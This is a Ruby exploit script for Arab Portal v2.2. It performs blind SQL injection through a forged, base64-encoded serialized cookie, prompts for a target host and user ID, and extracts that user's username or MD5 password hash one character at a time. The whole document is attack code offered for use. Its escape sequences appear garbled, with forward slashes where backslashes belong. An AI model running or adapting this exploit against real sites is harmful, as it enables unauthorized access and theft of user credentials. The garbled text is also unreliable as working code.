#!/usr/bin/ruby
#=============================================#
# Arab Portal v2.2 Exploit #,
# Blind SQL Injection / Authentication Bypass #
# Discovered & written by: Jafer Al-Zidjali #
# Email: jafer@scorpionds.com #
# Website: www.scorpionds.com #
#=============================================#
require "net/http"
require "base64"
intro=[
"+=============================================+",
"+ Arab Portal v2.2 Exploit +",
"+ Blind SQL Injection / Authentication Bypass +",
"+ Discovered & written by: Jafer Al-Zidjali +",
"+ Email: jafer@scorpionds.com +",
"+ Website: www.scorpionds.com +",
"+=============================================+"
]
def print_intro text
w="|"
text.each do |str|
str.scan(/./) do |c|
STDOUT.flush
if w=="|"
print "/b"+c +w
w="/"
elsif w=="/"
print "/b"+c +w
w="-"
elsif w=="-"
print "/b"+c +w
w="//"
else
print "/b"+c +w
w="|"
end
sleep 0.05
end
print "/b "
puts ""
end
end
print_intro intro
puts "/nEnter host name (e.g. example.com):"
host=gets.chomp
puts "/nEnter script path (e.g. /arabportal/):"
path=gets.chomp
puts "/nEnter userid:"
userid=gets.chomp
puts "/nGetting cookie value..."
http = Net::HTTP.new(host, 80)
resp= http.get(path)
cookie = resp.response["set-cookie"]
len=cookie.split("; ").length
max=0
login_info=""
len.times do |count|
clen=cookie.split("; ")[count].length
if clen > max then
max=clen
login_info=cookie.split("; ")[count]
end
end
login_info=login_info.split(", ")
if login_info[0].length > login_info[1].length
login_info=login_info[0]
else
login_info=login_info[1]
end
login_info=login_info.split("=")[0]
puts "Cookie name is: "+login_info
puts "/nWhat do you want to do?"
puts "1. Get username."
puts "2. Get password hash."
opt=gets.chomp
if opt=="1"
unamelen=0
print "/nGetting username length"
20.times do |x|
stmt="#{userid}"+
"/x27/x20/x61/x6e/x64/x20/x6c"+
"/x65/x6e/x67/x74/x68/x28/x75"+
"/x73/x65/x72/x6e/x61/x6d/x65"+
"/x29/x3d#{x}/x20/x6f/x72/x20/x27/x27/x3d/x27"
shellcode="/x61/x3a/x35/x3a/x7b/x69/x3a/x30"+
"/x3b/x73/x3a/x31/x30/x3a/x22/x61"+
"/x72/x61/x62/x70/x6f/x72/x74/x61"+
"/x6c/x22/x3b/x69/x3a/x31/x3b/x69"+
"/x3a/x31/x3b/x69/x3a/x32/x3b/x73/x3a"+
stmt.length.to_s+
"/x3a/x22"+
stmt+
"/x22/x3b/x69/x3a/x33/x3b/x69/x3a"+
"/x30/x3b/x69/x3a/x34/x3b/x73/x3a"+
"/x31/x3a/x22/x61/x22/x3b/x7d"
header={
"Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(//s/,"")
}
resp= http.get(path,header)
if resp.body =~ /action=logout/
puts "/nLength is: #{x}"
unamelen=x
break
else
print "."
STDOUT.flush
end
end
chars="abcdefghijklmnopqrstuvwxyz0123456789"
print "/nGetting username: "
unamelen.times do |z|
chars.scan(/./) do |c|
stmt="#{userid}"+
"/x27/x20/x61/x6e/x64/x20/x73"+
"/x75/x62/x73/x74/x72/x69/x6e"+
"/x67/x28/x75/x73/x65/x72/x6e"+
"/x61/x6d/x65/x2c#{z+1}/x2c/x31/x29/x3d/x27#{c}/x27/x20/x6f/x72/x20/x27/x27/x3d/x27"
shellcode="/x61/x3a/x35/x3a/x7b/x69/x3a/x30"+
"/x3b/x73/x3a/x31/x30/x3a/x22/x61"+
"/x72/x61/x62/x70/x6f/x72/x74/x61"+
"/x6c/x22/x3b/x69/x3a/x31/x3b/x69"+
"/x3a/x31/x3b/x69/x3a/x32/x3b/x73/x3a"+
stmt.length.to_s+
"/x3a/x22"+
stmt+
"/x22/x3b/x69/x3a/x33/x3b/x69/x3a"+
"/x30/x3b/x69/x3a/x34/x3b/x73/x3a"+
"/x31/x3a/x22/x61/x22/x3b/x7d"
header={
"Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(//s/,"")
}
print c
STDOUT.flush
http = Net::HTTP.new(host, 80)
resp= http.get(path,header)
if resp.body =~ /action=logout/
break
end
print "/b"
end
end
puts "/nHave fun :)"
elsif opt=="2"
chars="0123456789abcdef"
print "/nGetting password hash: "
32.times do |z|
chars.scan(/./) do |c|
stmt="#{userid}"+
"/x27/x20/x61/x6e/x64/x20/x73/x75"+
"/x62/x73/x74/x72/x69/x6e/x67/x28"+
"/x70/x61/x73/x73/x77/x6f/x72/x64"+
"/x2c#{z+1}/x2c/x31/x29/x3d/x27#{c}/x27"+
"/x20/x6f/x72/x20/x27/x27/x3d/x27"
shellcode="/x61/x3a/x35/x3a/x7b/x69/x3a/x30"+
"/x3b/x73/x3a/x31/x30/x3a/x22/x61"+
"/x72/x61/x62/x70/x6f/x72/x74/x61"+
"/x6c/x22/x3b/x69/x3a/x31/x3b/x69"+
"/x3a/x31/x3b/x69/x3a/x32/x3b/x73/x3a"+
stmt.length.to_s+
"/x3a/x22"+
stmt+
"/x22/x3b/x69/x3a/x33/x3b/x69/x3a"+
"/x30/x3b/x69/x3a/x34/x3b/x73/x3a"+
"/x31/x3a/x22/x61/x22/x3b/x7d"
header={
"Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(//s/,"")
}
print c
STDOUT.flush
http = Net::HTTP.new(host, 80)
resp= http.get(path,header)
if resp.body =~ /action=logout/
break
end
print "/b"
end
end
puts "/nHave fun :)"
end